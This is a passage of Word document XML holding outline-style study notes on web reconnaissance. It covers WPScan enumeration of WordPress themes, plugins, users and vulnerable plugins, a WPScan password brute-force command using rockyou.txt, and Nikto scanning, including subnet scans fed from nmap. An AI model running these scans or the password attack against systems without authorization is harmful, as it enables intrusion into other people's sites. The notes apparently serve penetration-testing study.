        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>check source code of website for additional references to theme</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56828CF4" w14:textId="26359839" w:rsidR="00E422B9" w:rsidRDefault="00E422B9" w:rsidP="00E422B9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Automatically</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="711D8970" w14:textId="358B776B" w:rsidR="00E422B9" w:rsidRDefault="00E422B9" w:rsidP="00E422B9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00E422B9">
        <w:t>wpscan --url http://</w:t>
      </w:r>
      <w:r>
        <w:t>&lt;website&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00E422B9">
        <w:t>/ --enumerate t</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42710416" w14:textId="067AC222" w:rsidR="00E422B9" w:rsidRDefault="00E422B9" w:rsidP="00E422B9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Enumerating for Installed Plugins</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E763515" w14:textId="07B606A8" w:rsidR="00E422B9" w:rsidRDefault="00E422B9" w:rsidP="00E422B9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Directory Listing is often enabled by default</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D2A1087" w14:textId="0319DF19" w:rsidR="00D10AAF" w:rsidRDefault="00D10AAF" w:rsidP="00E422B9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>can check wp-content/plugins/pluginname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12907D0E" w14:textId="4D2C3AFE" w:rsidR="00D10AAF" w:rsidRDefault="00D10AAF" w:rsidP="00D10AAF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>readme files also</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34DFF452" w14:textId="55CABF9E" w:rsidR="00D10AAF" w:rsidRDefault="00D10AAF" w:rsidP="00D10AAF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00D10AAF">
        <w:t>wpscan --url http:// &lt;website</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> &gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00D10AAF">
        <w:t>/ --enumerate p</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E25F733" w14:textId="54CB805A" w:rsidR="00D10AAF" w:rsidRDefault="00D10AAF" w:rsidP="00D10AAF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Enumerating for Users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E07E8BF" w14:textId="13B994A2" w:rsidR="00D10AAF" w:rsidRDefault="00D10AAF" w:rsidP="00D10AAF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>searches for authors, as WP considers them users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5187C944" w14:textId="33A4390F" w:rsidR="00D10AAF" w:rsidRDefault="00D10AAF" w:rsidP="00D10AAF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00D10AAF">
        <w:t>wpscan --url http://</w:t>
      </w:r>
      <w:r>
        <w:t>&lt;website&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00D10AAF">
        <w:t>/ --enumerate u</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E2DB99C" w14:textId="242074B2" w:rsidR="00D10AAF" w:rsidRDefault="00D10AAF" w:rsidP="00D10AAF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>The Vulnerable Flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C29A4BD" w14:textId="46801A1A" w:rsidR="00D10AAF" w:rsidRDefault="00D10AAF" w:rsidP="00D10AAF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Automatically</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B762AFE" w14:textId="15F2574F" w:rsidR="00D10AAF" w:rsidRDefault="00D10AAF" w:rsidP="00D10AAF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>uses v argument</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D0C27F3" w14:textId="75F38BBF" w:rsidR="00D10AAF" w:rsidRDefault="00D10AAF" w:rsidP="00D10AAF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00D10AAF">
        <w:t>wpscan --url http://</w:t>
      </w:r>
      <w:r>
        <w:t>&lt;website&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00D10AAF">
        <w:t>/ --enumerate vp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B450C9C" w14:textId="2C3759FA" w:rsidR="00D10AAF" w:rsidRDefault="00D10AAF" w:rsidP="00D10AAF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>requires installation of WPVulnDB API</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="628394A6" w14:textId="152AEE07" w:rsidR="00D10AAF" w:rsidRDefault="00D10AAF" w:rsidP="00D10AAF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Performing a Password Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AFA4DB3" w14:textId="4E23FFC5" w:rsidR="00D10AAF" w:rsidRDefault="00D10AAF" w:rsidP="00D10AAF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00D10AAF">
        <w:t>wpscan –url http://</w:t>
      </w:r>
      <w:r>
        <w:t>&lt;website</w:t>
      </w:r>
      <w:r w:rsidRPr="00D10AAF">
        <w:t xml:space="preserve"> –passwords rockyou.txt –usernames </w:t>
      </w:r>
      <w:r>
        <w:t>&lt;username&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5618125D" w14:textId="24E780B5" w:rsidR="00D10AAF" w:rsidRDefault="00D10AAF" w:rsidP="00D10AAF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Adjusting WPScans Aggressiveness (WAF)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60415B3F" w14:textId="519982D0" w:rsidR="00D10AAF" w:rsidRDefault="00D10AAF" w:rsidP="00D10AAF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>use arguments with aggression profile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="093C4480" w14:textId="719388FF" w:rsidR="00D10AAF" w:rsidRDefault="00D10AAF" w:rsidP="00D10AAF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>ex. - -plugins-detection aggressive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43FB8C7B" w14:textId="4AC32415" w:rsidR="00F223DC" w:rsidRDefault="00F223DC" w:rsidP="00D10AAF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>ex. - -plugins-detection passive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B4C235A" w14:textId="0170FF24" w:rsidR="00F223DC" w:rsidRDefault="00F223DC" w:rsidP="00F223DC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Introduction to Nikto</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F8C957" w14:textId="7B55385B" w:rsidR="00F223DC" w:rsidRDefault="00F223DC" w:rsidP="00F223DC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>vulnerability scanner, web server assessment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5FE9E1" w14:textId="04AB34AC" w:rsidR="00F223DC" w:rsidRDefault="00F223DC" w:rsidP="00F223DC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>sensitive files, outdated servers and programs, common server and software misconfigurations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37106574" w14:textId="40B11C42" w:rsidR="00F223DC" w:rsidRDefault="00F223DC" w:rsidP="00F223DC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Installing Nikto</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6595E7CA" w14:textId="53887FA7" w:rsidR="00F223DC" w:rsidRDefault="00F223DC" w:rsidP="00F223DC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>sudo apt update &amp;&amp; sudo apt install nikto</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36961903" w14:textId="052B8127" w:rsidR="00F223DC" w:rsidRDefault="007A6E65" w:rsidP="00F223DC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId19" w:anchor="id2780292" w:history="1">
        <w:r w:rsidR="00F223DC" w:rsidRPr="000C2180">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://cirt.net/nikto2-docs/installation.html#id2780292</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1FD1AE82" w14:textId="49B24F34" w:rsidR="00F223DC" w:rsidRDefault="00F223DC" w:rsidP="00F223DC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Nikto Modes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58956571" w14:textId="016A97B9" w:rsidR="00F223DC" w:rsidRDefault="00F223DC" w:rsidP="00F223DC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Basic Scanning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="714B44FC" w14:textId="0C5A93C5" w:rsidR="00F223DC" w:rsidRDefault="00F223DC" w:rsidP="00F223DC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>-h flag and IP address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E39A80" w14:textId="4B1B32EA" w:rsidR="00F223DC" w:rsidRDefault="00F223DC" w:rsidP="00F223DC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>ex. nikto -h &lt;ip&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7D075B" w14:textId="5EC31DD1" w:rsidR="00F223DC" w:rsidRDefault="00F223DC" w:rsidP="00F223DC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>retrieves headers advertised by webserver or application</w:t>
      </w:r>
      <w:r w:rsidR="001373EF">
        <w:t xml:space="preserve"> and look for sensitive files and directories</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E5BB882" w14:textId="6CC1317A" w:rsidR="001373EF" w:rsidRDefault="001373EF" w:rsidP="001373EF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Scanning Multiple Hosts and Ports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A93F9CD" w14:textId="1D494DA2" w:rsidR="001373EF" w:rsidRDefault="001373EF" w:rsidP="001373EF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>can scan a subnet using nmap and provide output in structure friendly to nikto using nmap -oG flags</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2033F67A" w14:textId="293D45A0" w:rsidR="001373EF" w:rsidRDefault="001373EF" w:rsidP="001373EF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>ex. nmap -p80 &lt;ip&gt;/24 -oG - | nikto -h –</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3534A6AB" w14:textId="01DDAE6B" w:rsidR="001373EF" w:rsidRDefault="001373EF" w:rsidP="001373EF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>typically one will more likely scan range of ports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3078DEB8" w14:textId="7CAA671B" w:rsidR="001373EF" w:rsidRDefault="001373EF" w:rsidP="001373EF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>ex. nikto -h &lt;ip&gt; -p &lt;ports&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30427870" w14:textId="410CE01F" w:rsidR="001373EF" w:rsidRDefault="001373EF" w:rsidP="001373EF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Introduction to Plugins</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25FEE180" w14:textId="2784D63F" w:rsidR="001373EF" w:rsidRDefault="001373EF" w:rsidP="001373EF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>use - -list-plugins flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E1BF1A6" w14:textId="10E1FD5A" w:rsidR="001373EF" w:rsidRDefault="001373EF" w:rsidP="001373EF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">or </w:t>
      </w:r>
      <w:hyperlink r:id="rId20" w:history="1">
        <w:r w:rsidRPr="000C2180">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/sullo/nikto/wiki/Plugin-list</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="04830FC2" w14:textId="4FDF30D9" w:rsidR="001373EF" w:rsidRDefault="001373EF" w:rsidP="001373EF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>good plugins to look for</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4061E167" w14:textId="42611E09" w:rsidR="001373EF" w:rsidRDefault="001373EF" w:rsidP="001373EF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>apacheusers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22CA130B" w14:textId="1008EDAC" w:rsidR="001373EF" w:rsidRDefault="001373EF" w:rsidP="001373EF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>cgi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41929881" w14:textId="09D821F9" w:rsidR="001373EF" w:rsidRDefault="001373EF" w:rsidP="001373EF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>robots</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="439C0E0C" w14:textId="78414FCB" w:rsidR="001373EF" w:rsidRDefault="001373EF" w:rsidP="001373EF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>dir-traversal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C9F204B" w14:textId="0524BD4C" w:rsidR="001373EF" w:rsidRDefault="001373EF" w:rsidP="001373EF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>specify plugin with -Plugin argument</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7EAFAC" w14:textId="52883F64" w:rsidR="001373EF" w:rsidRDefault="001373EF" w:rsidP="001373EF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>ex. nikto -h &lt;ip&gt; -Plugin apacheuser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF4CAA0" w14:textId="3F167876" w:rsidR="001373EF" w:rsidRDefault="001373EF" w:rsidP="001373EF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Verbosing the Scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C18274C" w14:textId="77EF6E66" w:rsidR="001373EF" w:rsidRDefault="001373EF" w:rsidP="001373EF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>provide arguments with -Display flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="376B3AC3" w14:textId="4E217817" w:rsidR="001373EF" w:rsidRDefault="001373EF" w:rsidP="001373EF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
